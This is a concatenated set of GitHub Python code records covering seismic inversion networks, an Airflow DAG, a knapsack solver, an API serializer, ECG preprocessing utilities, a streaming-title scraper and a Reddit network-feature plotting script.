super(Physics_deepwave, self).__init__()\n self.dh = dh\n self.dt = dt\n self.src = src\n self.src_loc = src_loc\n self.rec_loc = rec_loc\n rp_properties = rp_properties\n \n def forward(self, vp):\n \n out = deepwave.scalar(vp, self.dh, self.dt,\n source_amplitudes=self.src,\n source_locations=self.src_loc,\n receiver_locations=self.rec_loc)\n taux = out[-1]\n return taux.permute(0, 2, 1).unsqueeze(0)\n \n\nclass Physics_cufwi(nn.Module):\n def __init__(self, dh, dt, src,\n src_loc, rec_loc, rp_properties=None):\n super(Physics_cufwi, self).__init__()\n \n src_loc = src_loc.squeeze()\n temp = src_loc[:, 0].clone()\n src_loc[:, 0] = src_loc[:, 1]\n src_loc[:, 1] = temp\n src_loc = src_loc.squeeze()\n\n rec_loc = rec_loc[0, ...]\n temp = rec_loc[:, 0].clone()\n rec_loc[:, 0] = rec_loc[:, 1]\n rec_loc[:, 1] = temp\n\n self.dh = dh\n self.dt = dt\n # src = src.to(device=\"cpu\")\n self.src = src[0, 0, :].to(device=\"cpu\")\n self.src_loc = src_loc.to(device=\"cpu\")\n self.rec_loc = rec_loc.to(device=\"cpu\")\n rp_properties = rp_properties\n \n def forward(self, vp):\n print(self.src_loc)\n wave = AcousticWave(grid_spacing=self.dh, \n dt=self.dt, accuracy=4,\n source_amplitude=self.src, \n src_loc=self.src_loc,\n rec_loc=self.rec_loc,\n pml_width=20, chpr=99, \n save_wave=False)\n out = wave(vp.to(device=\"cpu\"))\n\n taux = out[-1]\n return taux.permute(2, 0, 1).unsqueeze(0)\n \n \nif __name__ == \"__main__\":\n import torch \n nb = 64\n nc = 6\n nz= 90\n nt = 150\n nx = 100\n \n data = torch.rand(nb, nc, nz, nx)\n sub_block = SubBlock(in_channels=nc,\n out_channels=2*nc,\n stride=1)\n data_shape = data.shape\n print(f\"Shape of data is: {data_shape}\")\n \n sub_block_data_shape = sub_block(data).shape\n assert sub_block_data_shape == (data_shape[0], data_shape[1]*2, data_shape[2], data_shape[3]),\\\n f\"SubBlock must only halves the number of channels! 
So, size should be {(data_shape[0], data_shape[1]*2, data_shape[2], data_shape[3])}, \"\\\n f\"but got {sub_block_data_shape}\"\n ","repo_name":"AmirMardan/pinn_fwi","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":12040,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"12773660681","text":"from pendulum import datetime\nfrom airflow.models import DAG\nfrom airflow import Dataset\nfrom pandas import DataFrame\nfrom astro import sql as aql\nfrom astro.sql.table import Table\n\n# Define constants for interacting with external systems\nSNOWFLAKE_CONN_ID = \"snowflake_default\"\nSNOWFLAKE_ORDERS = \"orders_table\"\n\n# Define datasets\norders_table_dataset = Table(conn_id=SNOWFLAKE_CONN_ID, name=SNOWFLAKE_ORDERS)\n#orders_table_dataset = Dataset(\"astro://snowflake_default@?table=orders_table\")\n\n# Define a function for transforming tables to dataframes\n@aql.dataframe\ndef transform_dataframe(df: DataFrame):\n amounts = df.loc[:, \"amount\"]\n print(\"Total amount:\", amounts.sum())\n return amounts.sum()\n\nwith DAG(\n dag_id=\"consumer_dag_1\",\n start_date=datetime(2019, 1, 1),\n schedule=[orders_table_dataset],\n catchup=False,\n):\n\n # Transform the reporting table into a dataframe\n sum_orders = transform_dataframe(\n Table(\n name=SNOWFLAKE_ORDERS,\n conn_id=SNOWFLAKE_CONN_ID,\n )\n )","repo_name":"astronomer/live-sdk-datasets","sub_path":"dags/consumer_dag_1.py","file_name":"consumer_dag_1.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42709731870","text":"n = int(input(\"No of items : \"))\r\nm = int(input(\"Capacity of bag : \"))\r\np = list(map(int, input(\"Enter profits : \").split()))\r\nw = list(map(int, input(\"Enter weights : \").split()))\r\nq = {p[i]:w[i] for i in range(n)}\r\nd = {}\r\nres = 0\r\nprint(\"\\nWeights are their Ratio's: \")\r\nprint(\"-\"*10)\r\nfor i in range(n):\r\n d[p[i]/w[i]] = p[i]\r\n print(w[i], \" \", round(p[i]/w[i],2))\r\n\r\nd = {k : v for k,v in sorted(d.items(), reverse= True)}\r\nfor k,v in d.items():\r\n if(q[v] <= m):\r\n m = m - q[v]\r\n res += v\r\n else:\r\n res += ((m/ q[v])*v)\r\n break\r\nprint(\"\\nThe Maximum Profit: {}\".format(res))\r\n","repo_name":"2002anonymous/DAA","sub_path":"fractional_greedy.py","file_name":"fractional_greedy.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3216722829","text":"from changes.api.serializer import Crumbler, register\nfrom changes.vcs.base import RevisionResult\n\n\n@register(RevisionResult)\nclass RevisionCrumbler(Crumbler):\n def crumble(self, instance, attrs):\n return {\n 'id': instance.id,\n 'sha': instance.id, # Having both id and sha is a bit distasteful. 
We should try to fix this.\n 'message': instance.message,\n 'author': None, # We don't return author information\n 'dateCreated': instance.author_date,\n 'dateCommitted': instance.committer_date,\n }\n","repo_name":"dropbox/changes","sub_path":"changes/api/serializer/vcs/revisionresult.py","file_name":"revisionresult.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"570507774","text":"\nimport scipy.io\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport pathlib as pl\nimport numpy as np\nimport random\n\n\n#=====================================================================================================\n\ndef read_heafile(file_name):\n # Function to read a .hea file and return its content as a list of strings\n # Open the .hea file\n with open(file_name, 'r') as file:\n # Read the content of the .hea file\n hea_content = file.readlines()\n\n return hea_content\n\n#====================================================================================================\n\ndef create_array(hea_content):\n ID = hea_content[0].strip().split()[0]\n \n # Extract 'Age' from .hea file content\n age_info = hea_content[13].strip().split()\n age = int(age_info[2]) if len(age_info) > 2 and age_info[2].isdigit() else 0\n \n # Extract 'Gender' from .hea file content\n gender = hea_content[14].strip().split()[2] if len(hea_content) > 14 else 'Unknown'\n \n # Extract 'Abnormality' from .hea file content\n abnormality = hea_content[15].strip().split()[2] if len(hea_content) > 15 else 'Unknown'\n \n return [ID, age, gender, abnormality]\n\n#===================================================================================================\ndef create_dataframes(training_directory):\n dataframes = {}\n\n subdirectories = [subdir for subdir in pl.Path(training_directory).iterdir() if subdir.is_dir()]\n \n for source_folder_path in subdirectories:\n source_folder_name = source_folder_path.name\n columns = ['ID', 'Age', 'Gender', 'Abnormality']\n source_dataframe = pd.DataFrame(columns=columns)\n patient_data = {} # To collect patient information\n \n for subdir in source_folder_path.iterdir():\n if subdir.is_dir():\n data_dir = pl.Path(subdir)\n header_files = list(data_dir.glob('*.hea'))\n\n for header_file in header_files:\n header_path = data_dir.joinpath(header_file.name)\n hea_content = read_heafile(header_path)\n patient_info = create_array(hea_content)\n patient_id = patient_info[0]\n \n # Collect patient information\n for i, column_name in enumerate(['Age', 'Gender', 'Abnormality']):\n patient_data.setdefault(patient_id, {})[column_name] = patient_info[i + 1]\n \n # Create a list of patient data dictionaries\n patient_rows = []\n for patient_id, info in patient_data.items():\n row = {'ID': patient_id, 'Age': info.get('Age'), 'Gender': info.get('Gender'), 'Abnormality': info.get('Abnormality')}\n patient_rows.append(row)\n \n # Concatenate patient data into the dataframe\n source_dataframe = pd.concat([source_dataframe, pd.DataFrame(patient_rows)])\n \n dataframes[f'{source_folder_name}_df'] = source_dataframe\n \n return dataframes\n\n\n#===================================================================================================\n\n# Function for normializing the wave \n#parameters \n# wave form representing the array\n# frequency for normalization\n# frequency of the waveform\ndef normalize_wave(array,nrm_freq,freq):\n factor = round(freq/nrm_freq)\n 
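# e.g. with freq = 500 Hz and nrm_freq = 250 Hz (illustrative values, not from this\n    # file), factor = 2 and the slicing below keeps every second sample of each lead.\n    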
normalized_array = []\n    for ele in array:\n        new_ele = ele[::factor]\n        normalized_array.append(new_ele)\n    return len(normalized_array[0]),np.array(normalized_array)\n\n\n#===================================================================================================\n\ndef normalize_mats(dir_path):\n    # This function will iterate through a data directory and return a list of \n    # normalized waveforms for the ECGs in that directory\n    normalized_waves = []\n    lengths = []\n    # Iterating through the subdirectories inside the given directory\n    for subdir in pl.Path(dir_path).iterdir():\n        if subdir.is_dir():\n            \n            data_dir = pl.Path(subdir)\n            head_file_list = list(data_dir.glob('*.hea'))\n            mat_file_list = list(data_dir.glob('*.mat'))\n            for i in range(len(head_file_list)):\n                head_file_path = data_dir.joinpath(head_file_list[i].name)\n                mat_file_path = data_dir.joinpath(mat_file_list[i].name)\n\n                data = scipy.io.loadmat(mat_file_path)['val']\n                current_frequency = int(read_heafile(head_file_path)[0].split()[2])\n                length,normalized_wave = normalize_wave(data,250,current_frequency)\n                normalized_waves.append(normalized_wave)\n                lengths.append(length)\n    return lengths,normalized_waves\n\n\n#===================================================================================================\n\ndef read_heads(dir_path):\n    # this function will create arrays of frequencies, numbers of points and combinations of them\n    freq_array = []\n    pts_array = []\n    both = []\n    # Iterating through the subdirectories inside the given directory\n    for subdir in pl.Path(dir_path).iterdir():\n        if subdir.is_dir():\n            \n            data_dir = pl.Path(subdir)\n            file_list = list(data_dir.glob('*.hea'))\n            \n            for file in file_list:\n                file_path = data_dir.joinpath(file.name)\n                data = read_heafile(file_path)\n                freq = int(data[0].split()[2])\n                points = int(data[0].split()[3].strip('\\n'))\n                freq_array.append(freq)\n                pts_array.append(points)\n                both.append([freq,points])\n    \n    return freq_array,pts_array,both\n\n\n#===================================================================================================\n\ndef create_anomalies_array(data):\n    \"\"\"\n    This function will take the anomalies dataframe (read from a .csv file) as the input.\n    It will create an array containing all the anomalies\n    \"\"\"\n    anomalies_array = []\n    \n    for index,row in data.iterrows():\n        anomalies_array.append(row['SNOMED CT Code'])\n    \n    return anomalies_array\n\n#===================================================================================================\n\ndef create_single_output_array(array,anomalies):\n    \"\"\"\n    This will take the anomalies array and the array of anomalies of a patient\n    This will output an array containing binary values.\n    It holds a 1 when the patient has the relevant anomaly, otherwise 0\n    \"\"\"\n    data = create_anomalies_array(anomalies)\n    \n    for i in range(len(data)):\n        if(data[i] in array):\n            data[i] = 1\n        else:\n            data[i] = 0\n    return data\n\n#===================================================================================================\n\ndef create_output_array(df,anomalies):\n    \"\"\"\n    This will take the anomalies array and a data frame as the input\n    This will output the Y data set \n    \"\"\"\n    Y = []\n    \n    for index,row in df.iterrows():\n        # Create the anomalies array for the relevant row\n        # --------code here---------\n        array = []\n        \n        output = create_single_output_array(array,anomalies)\n        Y.append(output)\n    \n    return np.array(Y)\n\n\n#===================================================================================================\n
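\n# Hypothetical usage sketch for the helpers above (codes illustrative, not from this\n# file): if the anomalies CSV lists [270492004, 164889003, 164909002] in its\n# 'SNOMED CT Code' column, create_single_output_array([164889003], anomalies)\n# returns [0, 1, 0].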
\ndef create_y_array(df,data,source_file):\n    \"\"\"\n    This function will take a dataframe(heads),csv of anomalies and a list of source files\n    This will output the Y array for the given source files(Y array is the array containing training labels)\n    \"\"\"\n    Y = []\n    for ele in source_file:\n        y = create_output_array(df[ele],data)\n        Y = Y + y\n    return Y\n\n#===================================================================================================\n\ndef create_x_array(source_file):\n    \"\"\"\n    This function will take a list of source files\n    This will output the X array for the given source files(X array is the array containing training X data)\n    \"\"\"\n\n    X = []\n    lengths = []\n    for ele in source_file:\n        length,array = normalize_mats('training/' + ele)\n        lengths = lengths + length\n        X = X + array\n    return X,lengths\n\n\n#===================================================================================================\n\ndef equalizing_wave_array(x_copy):\n    \"\"\"\n    This function will take the X array and equalize the length of the waves\n    \"\"\"\n    x_copy_new = []\n    for ele in x_copy:\n        \n        size = len(ele[0])\n\n        # If the size of the array is less than 2617 it will add noise at the beginning and the end\n        if(size < 2617):\n            \n            start = round((2617 - size)/2)\n            end = 2617 - size - start\n            \n            new_array = []\n            \n            for data in ele:\n\n                lower_bound,upper_bound = min(data),max(data)\n                \n                start_list = [random.randint(lower_bound, upper_bound) for _ in range(start)]\n                end_list = [random.randint(lower_bound, upper_bound) for _ in range(end)]\n                \n                new_sub_array = np.array(start_list + list(data) + end_list)\n                new_array.append(new_sub_array)\n            \n            x_copy_new.append(new_array)\n        \n        # Else it will simply cut off the extra part from the beginning and the end\n        else:\n            extra = size - 2617\n            half_extra = round(extra/2)\n            \n            new_array = []\n            \n            for data in ele:\n                new_sub_array = list(data)[(half_extra-1):(half_extra + 2616)]\n                new_array.append(new_sub_array)\n            x_copy_new.append(new_array)\n\n\n    return x_copy_new\n\n\n\n#===================================================================================================\n\ndef process_input(array,freq):\n\n    \"\"\"\n    This function will process the input so that it can be fed into the model to do the prediction\n    When the input array and the frequency are given it will return an array of size (1,12,2617) by\n    Normalizing and Reshaping the wave\n    \"\"\"\n    \n    size,normalized_wave = normalize_wave(array,250,freq)\n    \n    \n    if(size < 2617):\n        \n        start = round((2617 - size)/2)\n        end = 2617 - size - start\n        \n        new_array = []\n        for data in normalized_wave:\n            \n            lower_bound,upper_bound = min(data),max(data)\n            \n            start_list = [random.randint(lower_bound, upper_bound) for _ in range(start)]\n            end_list = [random.randint(lower_bound, upper_bound) for _ in range(end)]\n            \n            new_sub_array = np.array(start_list + list(data) + end_list)\n            new_array.append(new_sub_array)\n        \n        return np.expand_dims(np.array(new_array),axis = 0)\n    else:\n        \n        extra = size - 2617\n        half_extra = round(extra/2)\n        \n        new_array = []\n        \n        for data in normalized_wave:\n            new_sub_array = list(data)[(half_extra-1):(half_extra + 2616)]\n            new_array.append(new_sub_array)\n        \n        return np.expand_dims(np.array(new_array),axis = 0)\n    \n\n#===================================================================================================\n\ndef get_best_(array,df):\n    table_data = {\n        'Abnormality' : [],\n        'SNOMED CT Code' : [],\n        'Abbrevation' : [],\n        'Probability' : []\n    }\n\n    sorted_array = sorted(array)[::-1]\n    for 
ele in sorted_array[0:9]:\n index = array.index(ele)\n row_data = df.iloc[index]\n table_data['Abnormality'].append(row_data['Dx'])\n table_data['SNOMED CT Code'].append(row_data['SNOMED CT Code'])\n table_data['Abbrevation'].append(row_data['Abbreviation'])\n table_data['Probability'].append(ele)\n\n df = pd.DataFrame(table_data)\n\n return df","repo_name":"IsuruGunarathne/CardioScanPro","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32015295240","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport argparse\nimport re\nimport subprocess\nfrom requests import post,get\nimport logging\nimport string\nimport html\n#import yaml\n\n\nparser = argparse.ArgumentParser()\n\n#group = parser.add_mutually_exclusive_group(required=True)\n\nparser.add_argument(\"-p\", \"--process\", help=\"process raw.txt\", action='count')\nparser.add_argument(\"--refresh_amz\", help=\"refresh lists\", action='count')\nparser.add_argument(\"--refresh_nf\", help=\"refresh lists\", action='count')\n\nparser.add_argument(\"-v\", \"--verbose\", help=\"verbose output, can be specified multiple times\", action=\"count\")\n\nargs = parser.parse_args()\n\nLOG_FILE='./netflix.log'\nlogging.basicConfig(level=logging.DEBUG, filename=LOG_FILE, filemode=\"a+\",\n format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n\ndef log(*msg):\n #logging.info(\" \".join(msg))\n print (msg);\n\ndef clean_title(title):\n title = re.sub(\" Season [0-9]+\",'', title)\n title = title.replace('.','_')\n title = title.replace('+','and')\n title = title.replace(',','_')\n title = title.replace(' ','_')\n title = title.replace('!','')\n title = title.replace('?','')\n title = title.replace(':','_')\n title = title.replace(\"'\",'')\n title = title.replace(\"&\",'and')\n title = title.replace(\"*\",'_')\n title = title.replace(\"(\",'_')\n title = title.replace(\")\",'_')\n title = re.sub(\"_$\",'', title)\n return title\n\ndef clean_long_title(title):\n title = re.sub(\" Season [0-9]+\",'', title)\n title = title.replace('&','and')\n title = title.replace('+','and')\n title = title.replace(':','and')\n title = title.replace(',','')\n return title\n\nif args.refresh_nf:\n with open('../apps/jarvis/tv_netflix_raw.txt', 'w') as outfile:\n outfile.seek(0)\n for page in range(1, 21):\n url = (\"http://instantwatcher.com/search?page={}\"\n \"genres=83&page_title=TV+Series&sort=queue_count+desc&\"\n \"view=text&average_rating=32-max&content_type%5B%5D=3&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=10&language_audio=18\".format(page))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1 = open('../apps/jarvis/tv_extra.txt', 'r')\n for line in infile1:\n line = line.replace(' ','%20')\n line = line.rstrip()\n url = (\"http://instantwatcher.com/search?\"\n \"q={}&view=text&content_type%5B%5D=2&content_type%5B%5D=3&\"\n \"maturity_rating_level%5B%5D=2&maturity_rating_level%5B%5D=5&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=9&\"\n \"maturity_rating_level%5B%5D=10\".format(line))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1.close()\n outfile.truncate()\n outfile.close()\n\nif args.refresh_amz:\n with open('../apps/jarvis/tv_amazon_raw.txt', 'w') as outfile:\n outfile.seek(0)\n for page in range(1, 29):\n url = 
(\"http://instantwatcher.com/a/search?\"\n \"page_title=Prime+TV&page={}sort=ratings_count+desc&view=text&\"\n \"&year=1950-max&amzn_rating=6-max&prime%5B%5D=2&\"\n \"content_type%5B%5D=2&quality%5B%5D=1&quality%5B%5D=2&\"\n \"maturity_rating_level%5B%5D=2&maturity_rating_level%5B%5D=5&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=9&\"\n \"maturity_rating_level%5B%5D=10\".format(page))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1 = open('../apps/jarvis/tv_extra.txt', 'r')\n for line in infile1:\n line = line.replace(' ','%20')\n url = (\"http://instantwatcher.com/search?page_title=Prime+TV&\"\n \"q={}&view=text&content_type%5B%5D=2&content_type%5B%5D=3&\"\n \"maturity_rating_level%5B%5D=2&maturity_rating_level%5B%5D=5&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=9&\"\n \"maturity_rating_level%5B%5D=10\".format(line))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1.close()\n\n\n outfile.truncate()\n outfile.close()\n\nshows = {}\n\nif args.process:\n\n with open('../apps/jarvis/tv_netflix_raw.txt', 'r') as infile:\n infile.seek(0)\n for line in infile:\n match = re.findall(\n \"data-title-id=\\\"[0-9]+\\\">[a-zA-Z0-9 \\:\\`\\'\\&\\*\\#\\;\\.\\,\\?]+\",\n line)\n for title in match:\n #print(title)\n contentid_match = re.search('[0-9]+', title)\n title_match = re.search('>(.*)', title)\n content_id = contentid_match.group(0)\n title = str(html.unescape(title_match.group(1)))\n long_title = title\n season = '1'\n title = clean_title(title)\n long_title = clean_long_title(long_title)\n title = re.sub(\" Season [0-9]+\",'', title)\n\n shows[title]={'title': title,\n 'long_title': long_title,\n 'channel': '12',\n 'seasons': {\n season: content_id\n }\n }\n with open('../apps/jarvis/tv_amazon_raw.txt', 'r') as infile:\n infile.seek(0)\n for line in infile:\n matches = re.findall(\n \"data-title-id=\\\"[0-9]+\\\">[a-zA-Z0-9 \\:\\`\\'\\&\\*\\#\\;\\.,]+.*?\"\n \"ref=atv_feed_catalog\",\n line)\n for match in matches:\n title_match = re.search('>(.*?)<', match)\n title = str(html.unescape(title_match.group(1)))\n print(title)\n contentid_match = re.search('product\\/([A-Z0-9]+)\\/ref', match)\n content_id = contentid_match.group(1)\n season_match = re.search('Season ([0-9]+)', match)\n season = season_match.group(1) if season_match else '1'\n season = str(int(season))\n #print(content_id)\n long_title = title\n long_title = clean_long_title(long_title)\n title = clean_title(title)\n\n if not shows.get(title):\n shows[title] = {}\n shows[title].update({'title': title,\n 'long_title': long_title,\n 'channel': '13',\n })\n if not shows[title].get('seasons'):\n shows[title]['seasons'] = {}\n\n #print(shows[title])\n #print(shows[title]['seasons'])\n #print(season, content_id)\n shows[title]['seasons'].update({\n season: content_id\n })\n #print(shows[title]['seasons'])\n #print(shows[title])\n\n\n\n\n outfile1 = open('../apps/jarvis/tv.yaml', 'w')\n outfile2 = open('../apps/jarvis/tv.txt', 'w')\n outfile1.seek(0)\n outfile2.seek(0)\n\n infile1 = open('../apps/jarvis/tv_extra.txt', 'r')\n for line in infile1:\n outfile2.write(line)\n\n# print(shows)\n for show, value in shows.items():\n #print(show)\n print(\"%s:\" % show)\n# print(\" channel: %s\" % value['channel'] )\n# print(\" seasons:\")\n\n outfile1.write('%s:\\n' % show )\n outfile1.write(' long_title: \"%s\"\\n' % value['long_title'])\n outfile1.write(' channel: 
%s\\n' % value['channel'])\n outfile1.write(' seasons: \\n')\n for season, content_id in value['seasons'].items():\n #print(\" %s: %s\" % (season, content_id))\n outfile1.write(\" %s: %s\\n\" % (season, content_id))\n\n outfile2.write('%s\\n' % value['long_title'])\n\n infile1.close()\n outfile1.truncate()\n outfile1.close()\n outfile2.truncate()\n outfile2.close()\n","repo_name":"tschmidty69/jarvis-appdaemon","sub_path":"jarvis/jarvis_tv/data/fetch_netflix_ids.py","file_name":"fetch_netflix_ids.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"15115337864","text":"import time\nimport os\nfrom deeprl.trainer import Trainer\nfrom deeprl.agents.pg_agent import PGAgent\nfrom deeprl.agents.ac_agent import ACAgent\nfrom deeprl.agents.dqn_agent import DQNAgent\n\ndef get_trainer(params):\n \n if (params['agent_name']=='pg'):\n params['agent_class'] = PGAgent\n params['train_batch_size'] = params['batch_size']\n elif (params['agent_name']=='a2c'):\n params['agent_class'] = ACAgent\n params['train_batch_size'] = params['batch_size']\n elif (params['agent_name']=='dqn'):\n params['agent_class'] = DQNAgent\n elif (params['agent_name']=='ddqn'):\n params['agent_class'] = DQNAgent\n else:\n print('Agent not implemented. Terminating...')\n return\n\n agent_params = {\n 'batch_size': params['batch_size'],\n 'train_batch_size': params['train_batch_size'],\n 'eval_batch_size': params['eval_batch_size'],\n\n 'gamma': params['gamma'],\n 'learning_rate': params['learning_rate'],\n 'n_layers': params['n_layers'],\n 'size': params['size'],\n \n 'use_gpu': params['use_gpu'],\n 'which_gpu': params['which_gpu'],\n\n 'num_critic_updates_per_agent_update': params['num_critic_updates_per_agent_update'],\n 'num_actor_updates_per_agent_update': params['num_actor_updates_per_agent_update'],\n 'num_target_updates': params['num_target_updates'],\n 'num_grad_steps_per_target_update': params['num_grad_steps_per_target_update'],\n 'target_update_freq': params['target_update_freq'],\n\n 'double_q': params['agent_name']=='ddqn'\n }\n\n params['agent_params'] = agent_params\n\n # Initialize logger path\n data_path = './runs'\n logdir = params['exp_name'] or params['agent_name']+'_'+ params['env_name']+'_'+time.strftime(\"%d-%m-%Y_%H-%M-%S\")\n logdir = os.path.join(data_path, logdir)\n params['logdir'] = logdir\n if not(os.path.exists(logdir)):\n os.makedirs(logdir)\n else:\n for f in os.listdir(logdir):\n os.remove(os.path.join(logdir, f))\n print(\"LOGGING TO: \", logdir)\n \n return Trainer(params)\n\ndef main():\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--env_name', type=str)\n parser.add_argument('--exp_name', type=str)\n parser.add_argument('--agent_name', type=str, default='ddqn')\n \n parser.add_argument('--epoch_size', type=int, default=200)\n parser.add_argument('--itr_per_epoch', type=int, default=10) # num of iterations per epoch for agent\n \n parser.add_argument('--num_critic_updates_per_agent_update', type=int, default=1)\n parser.add_argument('--num_actor_updates_per_agent_update', type=int, default=1)\n parser.add_argument('--num_target_updates', '-ntu', type=int, default=100)\n parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=1)\n parser.add_argument('--target_update_freq', type=int, default=1) # dqn target update frequency\n\n parser.add_argument('--batch_size', '-b', type=int, default=1000) #steps collected per iteration\n 
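# note: the batch sizes here and below are measured in collected env steps (see inline comments), not episodes\n 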
parser.add_argument('--train_batch_size', '-tb', type=int, default=500) #steps collected per train iteration\n parser.add_argument('--eval_batch_size', '-eb', type=int, default=100) #steps collected per eval iteration\n parser.add_argument('--ep_len', type=int)\n\n parser.add_argument('--gamma', type=float, default=1.0)\n parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)\n parser.add_argument('--n_layers', '-l', type=int, default=2)\n parser.add_argument('--size', '-s', type=int, default=64)\n \n parser.add_argument('--seed', type=int, default=1)\n parser.add_argument('--use_gpu', '-gpu', action='store_true')\n parser.add_argument('--which_gpu', '-gpu_id', default=0)\n \n # parser.add_argument('--video_log_freq', type=int, default=-1)\n # parser.add_argument('--scalar_log_freq', type=int, default=1)\n # parser.add_argument('--save_params', action='store_true')\n\n args = parser.parse_args()\n\n # convert to dictionary\n params = vars(args)\n\n trainer = get_trainer(params)\n trainer.train()\n trainer.run_env()\n trainer.logger.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RaindragonD/deeprl-pytorch","sub_path":"deeprl/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38657688025","text":"def readHotels():\n count = None\n distance = None\n hotel_distances = []\n hotel_ratings = []\n best = None\n baddest = None\n while True:\n file_name = input(\"Please enter hotel meta file path: \")\n try:\n with open(file_name, \"r\") as f:\n count = int(f.readline())\n distance = float(f.readline())\n for i in range(count):\n line = f.readline().split(\" \")\n hotel_distances.append(float(line[0]))\n hotel_ratings.append(float(line[1]))\n best = max(hotel_ratings)\n return best, distance, hotel_distances, hotel_ratings\n except:\n print(file_name, \"doesn't exist or is not a hotel meta file.\")","repo_name":"hexszeug/bwinf-40-dev","sub_path":"1_Runde/2_Aufgabe/2_try/src/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26940112587","text":"import random\n\ndef text(concrete_str): # takes a specific row from the DB, returns the task and the answer\n if concrete_str[1] == 1: # First type\n cur = concrete_str[3] # Pick the task text\n number = random.randint(70, 135) # Generate a number\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_1(number) # Call the function that returns the answer as a str\n result = [cur, answer]\n return result\n if concrete_str[1] == 2:\n cur = concrete_str[3] # Pick the task text\n number = random.randint(157, 245) # Generate a number\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_2(number) # Call the function that returns the answer as a str\n result = [cur, answer]\n return result\n if concrete_str[1] == 3:\n cur = concrete_str[3] # Pick the task text\n number = random.randint(21, 201) # Generate a number\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_3(number) # Call the function that returns the answer as a str\n result = [cur, answer]\n return result\n if concrete_str[1] == 4:\n cur = concrete_str[3] # Pick the task text\n number = 0\n while number % 2 == 0:\n number = random.randint(43, 177) # Generate an odd number\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_4(number) # Call the function that returns the answer as a str
\n result = [cur, answer]\n return result\n\ndef from10toX(number, ss):\n result = 0\n count = 0\n count_of_1 = 0\n count_of_0 = 0\n while number != 0:\n result += (number % ss) * 10 ** count\n number //= ss\n count += 1\n return result\n\ndef number_of_1(number):\n count_of_1 = 0\n while number != 0:\n if number % 2 == 1:\n count_of_1 += 1\n number //= 10\n return count_of_1\n\ndef from2to10(n):\n count = 0\n result = 0\n while n != 0:\n result += (2**count) * (n % 2)\n n //= 10\n count += 1\n return result\n\ndef algorithm_1(N):\n for i in range(2):\n curr = number_of_1(N)\n if curr % 2 == 0:\n N *= 10\n else:\n N = N*10 + 1\n return N\n\ndef exc6_1(number):\n R = from10toX(number, 2)\n N = R // 100\n while R != N:\n number += 1\n R = from10toX(number, 2)\n N = R // 100\n N = algorithm_1(N)\n print(N)\n N = from2to10(N)\n print(N)\n return str(N)\n\ndef exc6_2(number):\n number -= 1\n result = 255 - number\n return str(result)\n\ndef exc6_3(number):\n result = 256 - number\n return str(result)\n\ndef exc6_4(number):\n result = int((255 - number) / 2)\n return str(result)\n\n\n\n","repo_name":"JuliaChernykh/ChatBot","sub_path":"Bot/exc6.py","file_name":"exc6.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2442653805","text":"import pickle\nfrom keyfeatures_2_riccardo import getTime\nfrom statistics import mean, stdev\nimport matplotlib.pyplot as plt\n\n\n# Only for one time slice\ntimeSlice = 0\n\n# Path to key features\npath_KF_PushShift = \"Results/Pushshift\"\nsubreddits_PushShift = [\"CMV\", \"News\", \"The_Donald\"]\n\npath_KF = f\"Results/{getTime(timeSlice)}\"\nsubreddits = ['atheism',\n 'christianity',\n 'conservative',\n 'conspiracy',\n 'exchristian',\n 'flatearth',\n 'liberal',\n 'lockdownskepticism',\n 'news',\n 'politics',\n 'science']\n\n# Load key features of UN\nKF_UN_PushShift = {}\nKF_UN = {}\n\n# PushShift\nfor subreddit in subreddits_PushShift:\n with open(path_KF_PushShift + f'/{subreddit}_key_features.pickle', 'rb') as f:\n KF_UN_PushShift[subreddit] = pickle.load(f)\n\n# Other\nfor subreddit in subreddits:\n with open(path_KF + f'/{subreddit}_key_features.pickle', 'rb') as f:\n KF_UN[subreddit] = pickle.load(f)\n\n# Load key features of PCN\nKF_PCN_PushShift = {subreddit: dict() for subreddit in subreddits_PushShift}\nKF_PCN = {subreddit: dict() for subreddit in subreddits}\n\n# PushShift\nwith open(path_KF_PushShift + 